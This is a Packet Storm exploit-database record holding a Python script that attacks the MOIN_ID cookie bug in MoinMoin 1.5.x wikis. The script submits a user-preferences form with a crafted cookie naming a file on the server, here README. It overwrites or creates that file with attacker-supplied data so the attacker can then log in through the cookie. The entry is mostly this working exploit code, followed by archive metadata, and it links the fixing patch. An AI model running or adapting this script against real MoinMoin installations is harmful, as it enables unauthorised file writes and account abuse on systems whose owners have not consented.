ID PACKETSTORM:62916 Type packetstorm Reporter Fernando Quintero aka nonroot Modified 2008-01-24T00:00:00
Description
`#!/usr/bin/python
#
#Exploit for the MOIND_ID cookie Bug
# MoinMoin 1.5.x
#
#Find your patch in : http://hg.moinmo.in/moin/1.5/rev/e69a16b6e630
#
#Bug and exploit coded by just a nonroot and colombian user
#
#Enero 21 de 2008
#
#Greets: el directorio and all the SL community
#
#
import urllib2,sys
print "MoinMoin host: i.e: http://127.0.0.1:8000/"
host=raw_input("MoinMoin host ( include http and /): ")
#info for the new user
#
#user for the test
user='nonroot'
#password for the test
password='nonrootuser'
#email for the test
email='just@nonrootuser.co'
#file to overwrite
#by default this file is there, is there?
archivo='README'
#######
#
req = urllib2.Request(host)
adddata="action=userform&name="+user+"&aliasname=ilikecolombianpeople&password="+password+"&password2="+password+"&email="+email+"&css_url=&edit_rows=20&theme_name=modern&editor_default=text&editor_ui=freechoice&tz_offset=0&datetime_fmt=&language=&remember_me=1&show_fancy_diff=1&show_toolbar=1&show_page_trail=1&quicklinks=podriamos-insertar-codigo-php-aqui-verdad-que-si&save=Save"
headers={'Cookie':'MOIN_ID='+archivo}
req = urllib2.Request(host+"UserPreferences/",adddata,headers)
try:
r = urllib2.urlopen(req)
data=r.read()
except urllib2.HTTPError:
print "Wait a minute, is posible that the file: "+archivo+" doesn't have permission to write, think well, and try again"
sys.exit(2)
print "Ok, the file: "+archivo+" was created, and you can logging setting the cookie MOIN_ID='"+archivo+"'"+" in your browser."
sys.exit(0)
`
{"hash": "24c03d8ef87cf0352a8a61c28ee7b195b83828bac0b11518ce07a567ee0bb889", "sourceHref": "https://packetstormsecurity.com/files/download/62916/moinmoin-cookie.txt", "title": "moinmoin-cookie.txt", "id": "PACKETSTORM:62916", "published": "2008-01-24T00:00:00", "description": "", "modified": "2008-01-24T00:00:00", "sourceData": "`#!/usr/bin/python \n# \n#Exploit for the MOIND_ID cookie Bug \n# MoinMoin 1.5.x \n# \n#Find your patch in : http://hg.moinmo.in/moin/1.5/rev/e69a16b6e630 \n# \n#Bug and exploit coded by just a nonroot and colombian user \n# \n#Enero 21 de 2008 \n# \n#Greets: el directorio and all the SL community \n# \n# \nimport urllib2,sys \nprint \"MoinMoin host: i.e: http://127.0.0.1:8000/\" \nhost=raw_input(\"MoinMoin host ( include http and /): \") \n#info for the new user \n# \n#user for the test \nuser='nonroot' \n#password for the test \npassword='nonrootuser' \n#email for the test \nemail='just@nonrootuser.co' \n#file to overwrite \n#by default this file is there, is there? \narchivo='README' \n####### \n# \nreq = urllib2.Request(host) \nadddata=\"action=userform&name=\"+user+\"&aliasname=ilikecolombianpeople&password=\"+password+\"&password2=\"+password+\"&email=\"+email+\"&css_url=&edit_rows=20&theme_name=modern&editor_default=text&editor_ui=freechoice&tz_offset=0&datetime_fmt=&language=&remember_me=1&show_fancy_diff=1&show_toolbar=1&show_page_trail=1&quicklinks=podriamos-insertar-codigo-php-aqui-verdad-que-si&save=Save\" \nheaders={'Cookie':'MOIN_ID='+archivo} \nreq = urllib2.Request(host+\"UserPreferences/\",adddata,headers) \ntry: \nr = urllib2.urlopen(req) \ndata=r.read() \nexcept urllib2.HTTPError: \nprint \"Wait a minute, is posible that the file: \"+archivo+\" doesn't have permission to write, think well, and try again\" \nsys.exit(2) \nprint \"Ok, the file: \"+archivo+\" was created, and you can logging setting the cookie MOIN_ID='\"+archivo+\"'\"+\" in your browser.\" \nsys.exit(0) \n \n`\n", "reporter": "Fernando Quintero aka nonroot", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "afd35147b401357faf4b13b7e9104468"}, {"key": "modified", "hash": "2f3ff7c118f96cc46652863d95362941"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "2f3ff7c118f96cc46652863d95362941"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a95b25f4a01b0ea6d1e95738910d4388"}, {"key": "sourceData", "hash": "3476c51ba26b3289e0a2d3fa9d85c3b4"}, {"key": "sourceHref", "hash": "b7d71501ef337a850f306ef021b31f38"}, {"key": "title", "hash": "7ed58ae4d6952c93259dd3ee1d2b2c71"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/62916/moinmoin-cookie.txt.html", "lastseen": "2016-11-03T10:18:01", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}}